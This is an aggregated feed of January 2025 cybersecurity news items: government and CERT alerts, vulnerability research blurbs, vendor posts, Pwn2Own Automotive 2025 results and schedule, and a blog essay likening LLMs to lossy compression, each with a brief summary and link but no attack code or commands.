Security Alert (A25-01-17): Vulnerability in Microsoft Edge
2025-01-27T04:00:00Z | 1737950400

Microsoft released a security update to address a vulnerability in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
Linux Detection Engineering - A Continuation on Persistence Mechanisms
2025-01-27T00:00:00Z | 1737936000

This document continues the exploration of Linux detection engineering, emphasizing advancements in monitoring persistence mechanisms. By building on past practices and insights, it provides a roadmap for improving detection strategies in complex environments.

https://www.elastic.co/security-labs/continuation-on-persistence-mechanisms
Clone2Leak: Your Git Credentials Belong To Us
2025-01-26T00:00:00Z | 1737849600

Introduction Hello, I’m RyotaK ( @ryotkak ), a security engineer at GMO Flatt Security Inc. In October 2024, I was hunting bugs for the GitHub Bug Bounty program. After investigating GitHub Enterprise Server for a while, I felt bored and decided to try to find bugs on GitHub Desktop instead. After reading the source code of GitHub Desktop, I found a bug that allows a malicious repository to leak the user’s credentials. Since the concept of the bug is interesting, I decided to investigate other Git-related projects and found many bugs.

https://flatt.tech/research/posts/clone2leak-your-git-credentials-belong-to-us/
Exploit Me, Baby, One More Time: Command Injection in Kubernetes Log Query
2025-01-24T14:00:00Z | 1737727200

A vulnerability in Kubernetes allows remote code execution. Read how abusing Log Query can lead to a complete takeover of all Windows nodes in a cluster.

https://www.akamai.com/blog/security-research/2025/jan/2024-january-kubernetes-log-query-rce-windows
Logpoint 2025 predictions: Cybersecurity in transformation
2025-01-24T11:52:49Z | 1737719569

The year 2025 is upon us, and it’s time to reflect on what’s in store for the cybersecurity industry. Developing threats, geopolitics, and regulations will take its toll on security practitioners and call for new approaches, innovative technologies, and a sharper focus on resilience. Luckily, technological advancements show promising results in providing cybersecurity teams [...] The post Logpoint 2025 predictions: Cybersecurity in transformation appeared first on Logpoint.

https://www.logpoint.com/en/blog/logpoint-2025-cybersecurity-in-transformation/
Vulnerability in Eura7 CMSmanager software
2025-01-24T11:00:00Z | 1737716400

XSS (Cross-site Scripting) vulnerability has been found in Eura7 CMSmanager software (CVE-2024-11348).

https://cert.pl/en/posts/2025/01/CVE-2024-11348/
Cyber Weather December 2024
2025-01-24T10:30:00Z | 1737714600

In December, attempts of data breaches and ransomware attacks targeting network edge devices were detected. Additionally, phishing and various types of fraud impersonating authorities continued. The effective cooperation of authorities and the high level of preparedness were once again evident when the investigations of the damaged submarine cables started on December 25, 2024.

https://www.kyberturvallisuuskeskus.fi/en/news/cyber-weather-december-2024
Cyber Weather December 2024
2025-01-24T10:30:00Z | 1737714600

In December, attempts of data breaches and ransomware attacks targeting network edge devices were detected. Additionally, phishing and various types of fraud impersonating authorities continued. The effective cooperation of authorities and the high level of preparedness were once again evident when the investigations of the damaged submarine cables started on December 25, 2024.

https://www.kyberturvallisuuskeskus.fi/en/news/cyber-weather-december-2024
Weekly review of the National Cyber Security Centre Finland (NCSC-FI) - 3/2025
2025-01-24T09:02:38Z | 1737709358

You should not trust search engine results uncritically. Even this week, fake search results have been seen leading to phishing pages. This week we also report on how the NATO Summit in Finland went from a cyber security perspective. We remind you of the importance of secure management of network edge devices and of timely security updates. We also invite you to learn about the new regulatory requirements in the CRA (Cyber Resilience Act).

https://www.kyberturvallisuuskeskus.fi/en/news/weekly-review-national-cyber-security-centre-finland-ncsc-fi-32025
Weekly review of the National Cyber Security Centre Finland (NCSC-FI) - 3/2025
2025-01-24T09:02:38Z | 1737709358

You should not trust search engine results uncritically. Even this week, fake search results have been seen leading to phishing pages. This week we also report on how the NATO Summit in Finland went from a cyber security perspective. We remind you of the importance of secure management of network edge devices and of timely security updates. We also invite you to learn about the new regulatory requirements in the CRA (Cyber Resilience Act).

https://www.kyberturvallisuuskeskus.fi/en/news/weekly-review-national-cyber-security-centre-finland-ncsc-fi-32025
Hillstone License Management System (LMS)
2025-01-24T07:52:03Z | 1737705123

Hillstone License Management System (LMS) is a dedicated license management solution for virtual network function deployment such as Hillstone CloudEdge, virtual ADC, virtual WAF, and virtual BDS. The LMS solution breaks the limitation of existing appliance-based license management solutions and provides cloud service providers (CSPs) a more flexible, efficient and automatic solution to centrally manage […] The post Hillstone License Management System (LMS) appeared first on Hillstone Networks.

https://www.hillstonenet.com/more/resources/hillstone-cloudedge-license-management-solution-lms/
High Threat Security Alert (A25-01-15): Vulnerability in SonicWall SMA1000 Series Products
2025-01-24T04:00:00Z | 1737691200

SonicWall released a security advisory to address a vulnerability in SMA1000 series products.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A25-01-16): Multiple Vulnerabilities in QNAP Products
2025-01-24T04:00:00Z | 1737691200

QNAP has published security advisories to address multiple vulnerabilities in QNAP products.

https://www.govcert.gov.hk/en/alerts_detail.php
Pwn2Own Automotive 2025 - Day Three and Final Results
2025-01-24T03:17:16Z | 1737688636

Welcome to the third and final day of Pwn2Own Automotive 2025. Over the past two days, we have awarded $718,250 for 39 unique 0-days. Sina Kheirkhah has a commanding lead for Master of Pwn, but anything can happen. Here’s a look at today’s results… SUCCESS - Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam) used a single bug to exploit the ChargePoint EV charger. He earns himself another $25,000 and 5 Master of Pwn points. SUCCESS - The Synacktiv (@Synacktiv) team used a single integer overflow to exploit the Sony IVI. Their work earns them another $10,000 and 2 Master of Pwn points. SUCCESS - The Synacktiv (@Synacktiv) team used a single buffer overflow to exploit the Autel MaxiCharger. They were also able to demonstrate signals being transmitted via the Charging Connector for the add on. This work earns them $35,000 and 6 Master of Pwn points. SUCCESS/COLLISION - Bongeun Koo (@kiddo_pwn) of STEALIEN used three bugs to exploit the Ubiquiti charger, but two were already known. He still wins $26,750 and 4.5 Master of Pwn points. SUCCESS - Thanh Do (@nyanctl) of Team Confused was able to confuse the Alpine iLX-507 with a single stack buffer overflow. The unique bug earns him $10,000 and 2 Master of Pwn points. SUCCESS - The PHP Hooligans again show their expertise by using a single OS command injection bug to exploit the Kenwood DMX958XR. Their final attempt of the contest earns them another $10,000 and 2 Master of Pwn points. SUCCESS/COLLISION - Tobias Scharnowski (@ScepticCtf), Felix Buchmann (@diff_fusion), and Kristian Covic (@SeTcbPrivilege) of fuzzware.io used a two bug chain - including an uninitialized variable - to exploit the WOLFBOX EV charger. However, one of these bugs was previously known. The earn $18,750 and 2 Master of Pwn points. COLLISION - Rob Blakely and Andres Campuzano of the Technical Debt Collectors successfully exploited the Tesla Wall Connector, but they used a previously known bug. They still earn $12,500 and 2.5 Master of Pwn points. SUCCESS - Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam) used a command injection bug for his last exploit of the contest. He was able to pop the Alpine iLX-507 and earn himself another $10,000 and 2 more Master of Pwn points. SUCCESS - The final attempt of the contest was the Pwn2Own debut of Evan Grant (@stargravy). He successfuly used an OS command injection bug to exploit the Kenwood DMX958XR. His unique approach earns him $10,000 and 2 Master of Pwn points. And that’s a wrap! Pwn2Own Automotive 2025 is complete. In total, we awarded $886,250 for 49 0-days over the three day competition. With 30.5 points and $222,250 awarded, Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam) is our Master of Pwn. Here’s the top five standings: Thanks to all of the researchers and vendors who attended. Without their hard work and dedication, none of this would be possible. Thanks also to our partners at VicOne and our sponsor Tesla. Their partnership has been invaluable. Stay tuned for upcoming announcements about future Pwn2Own competitions. We have a lot in store. See you then!

https://www.thezdi.com/blog/2025/1/23/pwn2own-automotive-2025-day-three-and-final-results
WinVisor – A hypervisor-based emulator for Windows x64 user-mode executables
2025-01-24T00:00:00Z | 1737676800

WinVisor is a hypervisor-based emulator for Windows x64 user-mode executables that leverages the Windows Hypervisor Platform API to provide a virtualized environment for logging syscalls and enabling memory introspection.

https://www.elastic.co/security-labs/winvisor-hypervisor-based-emulator
How Data443’s Classification Solution Transforms Endpoint DLP
2025-01-23T20:31:32Z | 1737664292

Data has never been more important. With data breaches on the rise and the complexity of sensitive data growing, organizations are under huge pressure to protect their digital assets. But what happens when even the most advanced DLP tools fail? The post How Data443’s Classification Solution Transforms Endpoint DLP appeared first on Data443.

https://data443.com/how-data443s-classification-solution-transforms-endpoint-dlp/
ETW Threat Intelligence and Hardware Breakpoints
2025-01-23T16:16:50Z | 1737649010

Learn to bypass EDR detection using NtContinue for hardware breakpoints without triggering ETW Threat Intelligence. This technical blog explores kernel debugging, debug registers, and EDR evasion with code examples. The post ETW Threat Intelligence and Hardware Breakpoints appeared first on Praetorian.

https://www.praetorian.com/blog/etw-threat-intelligence-and-hardware-breakpoints/
Phish Happens
2025-01-23T15:14:50Z | 1737645290

My mom got phished.

https://www.hyas.com/blog/phish-happens
Celebrating our 2024 open-source contributions
2025-01-23T14:00:30Z | 1737640830

While Trail of Bits is known for developing security tools like Slither, Medusa, and Fickling, our engineering efforts extend far beyond our own projects. Throughout 2024, our team has been deeply engaged with the broader security ecosystem, tackling challenges in open-source tools and infrastructure that security engineers rely on every day. This year, our engineers […]

https://blog.trailofbits.com/2025/01/23/celebrating-our-2024-open-source-contributions/
Lawful Intelligence Evolution with AI and Machine Learning
2025-01-23T13:58:14Z | 1737640694

By gathering, collating, and drawing possible conclusions from all available information, AI and ML can act as resource multipliers for lawful and location intelligence, just as they do for network operations. The post Lawful Intelligence Evolution with AI and Machine Learning appeared first on SS8.

https://www.ss8.com/lawful-intelligence-evolution-with-ai-and-machine-learning/
Cursos CERT.br: Inscrições 2025 Abertas
2025-01-23T10:30:00Z | 1737628200

Estão abertas as inscrições para as turmas 2025 dos cursos ministrados pelo CERT.br: https://cursos.cert.br/inscricao/ Em 2025 o CERT.br ministrará os seguintes cursos: Overview of Creating and Managing CSIRTs Foundations of Incident Management Advanced Topics in Incident Handling

https://cursos.cert.br/inscricao/
The evolving landscape of data privacy: Key trends to shape 2025
2025-01-23T10:00:00Z | 1737626400

Incoming laws, combined with broader developments on the threat landscape, will create further complexity and urgency for security and compliance teams

https://www.welivesecurity.com/en/business-security/evolving-landscape-data-privacy-key-trends-shape-2025/
Season 11: The tech behind the TAG Heuer Porsche Formula E Team
2025-01-23T07:49:02Z | 1737618542

What does it take to lead in Formula E? Driver skill, precision engineering, and flawless race strategy, of course. But there’s something more – something that powers every split-second decision.  The ABB FIA Formula E World Championship is back. The speed and intensity of fierce competition heats up as Season 11 kicks off. The TAG... The post Season 11: The tech behind the TAG Heuer Porsche Formula E Team  appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-tech-behind-tag-heuer-porsche-formula-e-team/
High Threat Security Alert (A25-01-13): Multiple Vulnerabilities in Cisco Products
2025-01-23T04:00:00Z | 1737604800

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A25-01-14): Multiple Vulnerabilities in Google Chrome
2025-01-23T04:00:00Z | 1737604800

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Pwn2Own Automotive 2025 - Day Two Results
2025-01-23T03:41:34Z | 1737603694

Welcome to the second day of Pwn2Own Automotive 2025. Yesterday, we awarded more than $380,000 for 16 unique 0-days - and we had several bug collisions as well. Today looks to be even better, with the WOLFBOX and Tesla EV chargers making their Pwn2Own debut. Here’s how the Master of Pwn standings look at the beginning of Day Two: We’ll see how they look at the end of the day. Here are the Day Two results, which we will be updating throughout the competition. SUCCESS - Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam) combined a couple of bugs to exploit the WOLFBOX charger and introduce it to the world of Pwn2Own. His efforts earn him $50,000 and 5 Master of Pwn points. SUCCESS - The Tesla Wall Connector has been christened by the PHP Hooligans. They used a Numeric Range Comparison Without Minimum Check bug (CWE-839) to take over the machine and crash it. They earn $50,000 and 5 Master of Pwn points. SUCCESS/COLLISION - The team of @vudq16, @tacbliw, and @_q5ca from Viettel Cyber Security (@vcslab) used a command injection combined with a known bug to exploit the ChargePoint HomeFlex. They earn $18,750 and 3.75 Master of Pwn points. SUCCESS - We were definitely thrilled to see Cong Thanh (@ExLuck99) and Nam Dung (@greengrass19000) of ANHTUD use a command injection bug to exploit the Alpine iLX-507 and leave us a special message. Their round 2 win earns them $10,000 and 2 Master of Pwn points. COLLISION - The ZIEN, Inc. (@zien_security) of HANRYEOL PARK (@hanR0724), HYOJIN LEE (@meixploit), HYEOKJONG YUN (@dig06161), HYEONJUN LEE (@gul9ul), DOWON KWAK (@D0uneo), YOUNGMIN CHO (@ZIEN0621) successfully exploited the Kenwood DMX958XR, but they used a known bug. They still win $5,000 and 5 Master of Pwn points. SUCCESS - The folks from HT3 Labs (@ht3labs) used a missing authentication bug combined with an OS command injection to exploit the Phoenix Contact CHARX. Their 2nd round win nets them $25,000 and 5 Master of Pwn points. COLLISION - Although the team of Radu Motspan (@moradek), Polina Smirnova (@moe_hw) and Mikhail Evdokimov (@konatabrk) from PCAutomotive successfully exploited the Tesla Wall Connector, the bug they used was previously known. The still earn $22,500 and 3.5 Master of Pwn points. FAILURE - Unfortunately, the team o Tobias Scharnowski (@ScepticCtf), Felix Buchmann (@diff_fusion), and Kristian Covic (@SeTcbPrivilege) of fuzzware.io could not get their exploit of the ChargePoint HomeFlex working within the time allotted. SUCCESS/COLLISION - Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam) combined six different bugs, improper access control and stack-based buffer overflows, to exploit the Autel MaxiCharger. However, one of the bugs he used was previously known. He still earns $23,000 and 4.75 Master of Pwn points. COLLISION - Although the Pony 74 team successfully exploited the Kenwood DMX958XR, the bug they used was previously known. They still earn $5,000 and 1 Master of Pwn point. SUCCESS - The GMO Cybersecurity by Ierae, Inc. team combined an improper certificate validation bug to a path traversal to exploit the Alpine iLX-507. Their second round win earns them $10,000 and 2 Master of Pwn points. SUCCESS/COLLISION - Rafal Goryl of PixiePoint Security used a 2 bug chain to exploit the WOLFBOX Level 2 EV Charger, but one of the bugs was previously known. He earns himself $18,750 and 3.75 Master of Pwn points. SUCCESS - Radu Motspan (@moradek), Polina Smirnova (@moe_hw) and Mikhail Evdokimov (@konatabrk) of PCAutomotive chained three different bugs (a heap overflow, an authentication bypass, and an improper isolation bug) to exploit the Sony XAV-AX8500 with 0 clicks. Their third round win nets them $10,000 and 2 Master of Pwn points. SUCCESS - Sina Kheirkhah (@SinSinology) of the Summoning Team (@SummoningTeam) continues his successful run at the contest continues as he uses a command injection bug to exploit the Kenwood DMX958XR. His second round win earns him another $10,000 and 2 Master of Pwn points. SUCCESS - The team from Synacktiv used a logic bug as a part of their chain to exploit the Tesla Wall Connector via the Charging Connector. Their outstanding (and inventive) research earns them $45,000 and 7 Master of Pwn points. COLLISION - The CIS Team exploited the Alpine IVI but used a known bug. The ghost of CVE-2024-23924 rears its head as the specter of "shared risk" lingers. The unfixed Alpine bug from last year strikes again. The CIS Team still earns $5,000 and 1 Master of Pwn points. FAILURE - Unfortunately, the PHP Hooligans could not get their exploit of the WOLFBOX Level 2 EV Charger working within the time allotted. COLLISION - The Viettel Cyber Security (@vcslab) successfully exploited the Sony XAV-AX8500, but the bug they used was previously know. They earn $5,000 and 1 Master of Pwn point. FAILURE - Unfortunately, the fuzzware.io could not get their exploit of the EMPORIA EV Charger Level 2 EV Charger working within the time allotted. COLLISION - In his final attempt of the day, Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam) used a two bug chain to exploit the Tesla Wall Connector. However, both were already known by the vendor. This bug collision still earns him $12,500 and 2.5 Master of Pwn points. FAILURE - Unfortunately, Compass Security (@compasssecurity) could not get their exploit of the Alpine iLX-507 working within the time allotted. SUCCESS - Our final entry of Day Two saw Juurin Oy, Elias Ikkelä-Koski and Aapo Oksman export the Kenwood DMX958XR with a command injection bug. They earn $10,000 and 2 Master of Pwn points. That brings our Day Two total to $335,500 and the total for the event to $718,250. The teams demonstrated 23 unique 0-days today, and Sina Kheirkhah has a commanding lead for Master of Pwn. We’ll see what the final day of the contest brings.

https://www.thezdi.com/blog/2025/1/22/pwn2own-automotive-2025-day-two-results
NSFOCUS Licensed for SOC and Pentest Service in Malaysia in Accordance with Cyber Security Act 2024
2025-01-23T02:31:11Z | 1737599471

Santa Clara, Calif. January 23, 2025  – NSFOCUS, a global provider of intelligent hybrid security solutions, today announced that it has received two security service licenses from the National Cyber Security Agency (NACSA) of Malaysia, being one of the first licensed companies that can provide two crucial services in Malaysia: Managed SOC (Security Operations Center) […] The post NSFOCUS Licensed for SOC and Pentest Service in Malaysia in Accordance with Cyber Security Act 2024 appeared first on NSFOCUS, Inc., a global network and cyber security leader, protects enterprises and carriers from advanced cyber attacks..

https://nsfocusglobal.com/nsfocus-licensed-for-soc-and-pentest-service-in-malaysia-in-accordance-with-cyber-security-act-2024/
Hacking Subaru: Tracking and Controlling Cars via the STARLINK Admin Panel
2025-01-23T00:00:00Z | 1737590400

On November 20, 2024, Shubham Shah and I discovered a security vulnerability in Subaru’s STARLINK admin panel that gave us unrestricted access to all vehicles and customer accounts in the United States, Canada, and Japan.

https://samcurry.net/hacking-subaru
Stealing HttpOnly cookies with the cookie sandwich technique
2025-01-22T14:45:11Z | 1737557111

In this post, I will introduce the "cookie sandwich" technique which lets you bypass the HttpOnly flag on certain servers. This research follows on from Bypassing WAFs with the phantom $Version cookie

https://portswigger.net/research/stealing-httponly-cookies-with-the-cookie-sandwich-technique
SMA1000 Pre-Authentication Remote Command Execution Vulnerability
2025-01-22T12:45:16Z | 1737549916

Pre-authentication deserialization of untrusted data vulnerability has been identified in the SMA1000 Appliance Management Console (AMC) and Central Management Console (CMC), which in specific conditions could potentially enable a remote unauthenticated attacker to execute arbitrary OS commands.IMPORTANT: SonicWall PSIRT has been notified of possible active exploitation of the referenced vulnerability by threat actors. We strongly advises users of the SMA1000 product to upgrade to the hotfix release version to address the vulnerability.Please note that SonicWall Firewall and SMA 100 series products are not affected by this vulnerability. CVE: CVE-2025-23006 Last updated: Feb. 10, 2025, 11:33 a.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0002
LLMs as Lossy Compression of Information
2025-01-22T08:52:49Z | 1737535969

Back when I was studying computer science, one of the interesting bits was the discussion of the information content in a message which is distinct to the actual number of bits used to transmit the same message. I can remember a definition which involved the sum of logarithms of long-term occurrences versus the transmitted messages. The upshot was, that only if 0s and 1s are equally distributed, then each Bit contains one bit worth of information. The next iteration was compressibility: if there are patterns in the message, then a compression algorithm can reduce the number of bits needed to store the full message, thus the information content in original text does not equal its number of bits. This could be a simple Huffman encoding, or more advanced algorithms like Lempel-Ziv-Welch, but one of the main points here is that the algorithm is completely content agnostic. There are no databases of English words inside these compressors; they cannot substitute numerical IDs of word for the words themselves. That would be considered cheating in the generic compression game. (There are, of course, some instances of very domain-specific compression algorithms which do build on knowledge of the data likely to be transmitted. HTTP/2 or SIP header-compression are such examples.) Another interesting progress was the introduction of lossy compression. For certain applications (e.g., images, sounds, videos) it is not necessary to be able to reproduce the original file bit by bit, but only to generate something that looks or sounds very similar to the original media. This unlocked a huge potential for efficient compression. JPEG for images, MPEG3 for music and DIVX for movies reached the broad population by shrinking these files to manageable sizes. They made digital mixtapes (i.e., self-burned audio CDs) possible, CD-ROMs with pirated movies were traded in school yards and Napster started the online file-sharing revolution. Now we have the LLMs, the large language models which are an implementation of generative AI: Algorithms, combined with a large memory derived by processing huge amounts of content, can now transform texts, images, sounds and even videos into each other. They can act as compressors: you can feed text into an LLM and ask for a summary, but you can also ask it to expand an argument from a few bullet points into a short essay. The inner state of the LLM while it performs these actions kind of represents the essence of the content it is processing. The output format is independent of this state: in the simplest case, you can specify whether the output should be in German or in English, additionally, you can ask for different styles: write for children, write dry legal prose, be witty or even write the content as a poem. Translating from one medium to another is also possible: the AI can look at a picture and generate a textual description of the image, or vice-versa, it can create a picture out of a written content summary. I’m pretty sure the following scenario has already happened: An employee is asked to write a report on a certain subject: he thinks about the topic, comes up with a few ideas which he writes down as a list of bullet points. These are handed to an LLM with an appropriate prompt to generate a nice 5-page report detailing these points. The AI obliges and the resulting 5-pager is handed to the boss. Being short on time, he doesn’t want to read five pages, so he asks an LLM to summarize the paper to give him the core message in list of short statements. Ideally, the second LLM reproduces the same bullet point which the employee originally came up with, making the whole exercise a complete waste of computation resources. There are two points in this story which are important to note: First, if we are liberal with the concept of “lossy compression”, then the specific formulation of an idea in a language doesn’t really matter in terms of information content. If you give an LLM the same prompt time and time again, you will get different results each time. If, for example, you ask for a Limerick about a horse in a bar, you will get different ones almost every time. But on a more abstract level, they are all embodiments of the same concept: a Limerick about a horse in a bar. The same applies to a switch in languages: if you ask the LLM to change the output from German to English, the result will change substantially. But again: if you just look at the abstract ideas embodied in the text, the language it is written in just does not matter. The bible in Greek, English, or German might have very few words in common, but the content is the same. This is just like converting a picture from GIF to JPEG: The bits in the file have completely changed but given the right parsers they produce the same information content, with only some fuzziness in details caused by the jpeg compression. Secondly, when processing a prompt or analysing a text/image/sound, the LLM produces an activation pattern in its high-dimensional set of parameters that form the scaffolding of its memory, transforming the input into something that one might call its “state of mind”. This is the LLM-internal representation of the input, abstracting away the unimportant bits of incoming information and retaining the meaning. This internal state is opaque to us, we have little information which parameter corresponds to exactly what concept. I also don’t know the size in Bytes that this representation needs. Now comes the “generative” part of the AI: the combination of the state, the learned connections between the concept and the prompt enable the LLM to transform this opaque state of mind into an output that humans can understand. The output can be short, e.g., if the prompt asks for a short, written summary, or longer, if the target format is an essay. Coming back the example from above: the LLM does not iteratively compress a longer text into a summary by analysing individual sentences, instead it speedreads everything into something like short-term memory and then dumps out the highlights it found. If a short prompt can produce the same activation pattern as a long input text, then the information content is the same. This only works because the LLM has this huge storage of knowledge it can reference – something we said in the beginning that classic compression algorithms cannot utilize. So, as an example, the input “lyrics of the Beatles’ song Yesterday” and the actual lyrics as two dozen lines of text convey the same information to the LLM. This enables truly enormous compression rates. To summarize, it might be a helpful abstraction to view LLMs as lossy compression/de-compression machines that can utilize an enormous pool of knowledge to make the process much more efficient, as long as you accept the fact that this a very lossy compression which only preserves the core concepts contained in the input but is free to change the representation of this information content. And, of course, it is prone to make wrong associations and hallucinate content.

https://www.cert.at/en/blog/2025/1/llms-as-lossy-compression-of-information
Ratings and Reviews: Smart Buyer Insights for Single-Vendor SASE
2025-01-22T08:01:29Z | 1737532889

The post Ratings and Reviews: Smart Buyer Insights for Single-Vendor SASE appeared first on Cato Networks.

https://www.catonetworks.com/resources/gartner-peer-insights-ebook/
PlushDaemon compromises supply chain of Korean VPN service
2025-01-22T06:00:00Z | 1737525600

ESET researchers have discovered a supply-chain attack against a VPN provider in South Korea by a new China-aligned APT group we have named PlushDaemon

https://www.welivesecurity.com/en/eset-research/plushdaemon-compromises-supply-chain-korean-vpn-service/
Security Alert (A25-01-12): Multiple Vulnerabilities in Oracle Java and Oracle Products (January 2025)
2025-01-22T04:00:00Z | 1737518400

Oracle has released the Critical Patch Update (CPU) Advisory with collections of patches for multiple vulnerabilities found in Java SE and various Oracle products.

https://www.govcert.gov.hk/en/alerts_detail.php
Pwn2Own Automotive 2025 - Day One Results
2025-01-22T03:23:23Z | 1737516203

Welcome to the first day of Pwn2Own Automotive 2025. We have 18 entries to go through today, and we will be updating the results here as we have them. SUCCESS - The team from PCAutomotive used a stack-based buffer overflow to gain code execution on the Alpine IVI. They earn $20,000 and two Master of Pwn points. SUCCESS - The team from Viettel Cyber Security used an OS command injection bug to exploit the Kenwood IVI for code execution. They win $20,000 and 2 Master of Pwn points. SUCCESS - Cong Thanh (@ExLuck99) and Nam Dung (@greengrass19000) of ANHTUD used an integer overflow to gain code execution on the Sony XAV-AX8500. The earn themselves $20,000 and 2 Master of Pwn points. SUCCESS/COLLISION - Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam) used a 3 bug combo to exploit the Phoenix Contact CHARX SEC-3150, but one was publicly known. He still earns $41,750 and 4.25 Master of Pwn points. SUCCESS/COLLISION - It took a while for us to confirm, but confirm we did! The team from Synacktiv used a stack-based buffer overflow plus a known bug in OCPP to exploit the ChargePoint with signal manipulation through the connector. They earn $47,500 and 4.75 Master of Pwn points. SUCCESS - The PHP Hooligans used a heap-based buffer overflow to exploit the Autel charger. They earn $50,000 and 5 Master of Pwn points. SUCCESS - The team from GMO Cybersecurity by Ierae, Inc. used a stack-based buffer overflow to to confirm their second round exploit of the Kenwood IVI. They earn $10,000 and 2 Master of Pwn points. SUCCESS - The Viettel Cyber Security (@vcslab) team used a stack-based buffer overflow to exploit the Alpine IVI. This second round win earns the $10,000 and 2 Master of Pwn points. SUCCESS - Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam) proves he's never going to give us up or let us down by using a hard-coded cryptographic key bug in the Ubiquiti charger. He earns himself $50,000 and 5 Master of Pwn points - putting him in the early lead. SUCCESS - It may have take 3 attempts, but it's confirmed! Thanh Do (@nyanctl) of Team Confused used a heap-based buffer overflow to exploit the Sony IVI. His round 2 win nets him $10,000 and 2 Master of Pwn points. SUCCESS - After accessing an open port via power drill, Tobias Scharnowski (@ScepticCtf), Felix Buchmann (@diff_fusion), and Kristian Covic (@SeTcbPrivilege) of fuzzware.io leveraged a stack-based buffer overflow on the Autel MaxiCharger. Their second round win nets them $25,000 and 5 Master of Pwn points. COLLISION - Well that's awkward. SK Shieldus (@EQSTLab) used a OS command injection bug, but it was one demonstrated in last year's contest. Alpine chose not to patch it since "in accordance with ISO21434...the vulnerability is classified as 'Sharing the Risk'." Yikes. The SK Shieldus team earns $5,000 and 1 Master of Pwn point. Check out ZDI-24-846 for details on the original bug report. FAILURE - Unfortunately, Sina Kheirkhah (@SinSinology) could not get his exploit of the Sony IVI working within the time allotted. He still ends Day One of #Pwn2Own Automotive with $91,750 and 9.25 Master of Pwn points. SUCCESS - The Synacktiv (@Synacktiv) team used an OS command injection bug to exploit the Kenwood DMX958XR and play a video of the original Doom game. Their second round win earns them $10,000 and 2 Master of Pwn points. SUCCESS/COLLISION - Rob Blakely and Andres Campuzano of the Technical Debt Collectors used multiple bugs to exploit Automotive Grade Linux, but one of the bugs was previously known. They still earn $33,500 and 3.5 Master of Pwn points in the 1st PwnOwn attempt. SUCCESS - In our first Pwn2Own After Dark submission, Tobias Scharnowski (@ScepticCtf), Felix Buchmann (@diff_fusion), and Kristian Covic (@SeTcbPrivilege) of fuzzware.io leveraged an origin validation error bug to exploit the Phoenix Contact CHARX SEC-3150. The round 2 win earns them $25,000 and 5 Master of Pwn points. FAILURE - Unfortunately, Riccardo Mori of Quarkslab (@quarkslab) could not get his exploit of the Autel MaxiCharger AC Wallbox Commercial working within the time allotted. COLLISION - Bongeun Koo (@kiddo_pwn) of STEALIEN also used the bug exploited in the Alpine last year. He earns $5,000 and 1 Master of Pwn point - plus lots of style points for the Nyan Cat display. That wraps up Day 1 of #Pwn2Own Automotive 2025! In total, we awarded $382,750 for 16 unique 0-days. The team of Tobias Scharnowski (@ScepticCtf), Felix Buchmann (@diff_fusion), and Kristian Covic (@SeTcbPrivilege) of fuzzware.io is current in the lead for Master of Pwn, but Sina Kheirkhah (@SinSinology) is right on their heels. Stay tuned tomorrow for more results and surprises. #P2OAuto

https://www.thezdi.com/blog/2025/1/21/pwn2own-automotive-2025-day-one-results
Evaluating Threat Intelligence Providers: What Security Teams Need to Know
2025-01-22T00:00:00Z | 1737504000

Discover whether your team truly needs a threat intelligence feed with our unbiased white paper. This practical guide helps cybersecurity professionals assess their needs, identify gaps, and confidently evaluate options for a tailored, effective cyber defense strategy.

https://www.greynoise.io/blog/evaluating-threat-intelligence-providers-what-security-teams-need-to-know
Under lock and key: Protecting corporate data from cyberthreats in 2025
2025-01-21T10:00:00Z | 1737453600

Data breaches can cause a loss of revenue and market value as a result of diminished customer trust and reputational damage

https://www.welivesecurity.com/en/business-security/under-lock-key-protecting-corporate-data-cyberthreats-2025/
Pwn2Own Automotive 2025: The Full Schedule
2025-01-21T08:49:24Z | 1737449364

こんにちは and welcome to the second annual Pwn2Own Automotive competition. We are at Automotive World in Tokyo, and we’ve brought together some of the best researchers in the world to test the latest automotive components. We had our random drawing for the order of events earlier today, and from that, we have put together the following schedule. Please note that all times are local to Tokyo and may change at any point. Jump to:    Day One           Day Two           Day Three Day OneWednesday, January 22 – 1100 Synacktiv (@Synacktiv) targeting the ChargePoint Home Flex in the Electric Vehicle Chargers category with the Charging Connector Protocol/Signal Manipulation addon for $60000 and 6 Master of Pwn Points. Wednesday, January 22 – 1130 Viettel Cyber Security (@vcslab) targeting the Kenwood DMX958XR in the In-Vehicle Infotainment (IVI) category for $20000 and 2 Master of Pwn Points. Radu Motspan (@_moradek_), Polina Smirnova (@moe_hw) and Mikhail Evdokimov (@konatabrk) of PCAutomotive targeting the Alpine iLX-507 in the In-Vehicle Infotainment (IVI) category for $20000 and 2 Master of Pwn Points. Wednesday, January 22 – 1200 Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam) targeting the Phoenix Contact CHARX SEC-3150 in the Electric Vehicle Chargers category for $50000 and 5 Master of Pwn Points. Wednesday, January 22 – 1230 Cong Thanh (@ExLuck99) and Nam Dung (greengrass19000) of ANHTUD targeting the Sony XAV-AX8500 in the In-Vehicle Infotainment (IVI) category for $20000 and 2 Master of Pwn Points. Wednesday, January 22 – 1300 PHP Hooligans targeting the Autel MaxiCharger AC Wallbox Commercial in the Electric Vehicle Chargers category for $50000 and 5 Master of Pwn Points. Wednesday, January 22 – 1330 GMO Cybersecurity by Ierae, Inc. targeting the Kenwood DMX958XR in the In-Vehicle Infotainment (IVI) category for $20000 and 2 Master of Pwn Points. Viettel Cyber Security (@vcslab) targeting the Alpine iLX-507 in the In-Vehicle Infotainment (IVI) category for $20000 and 2 Master of Pwn Points.  Wednesday, January 22 – 1400  Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam) targeting the Ubiquiti Connect EV Station in the Electric Vehicle Chargers category for $50000 and 5 Master of Pwn Points. 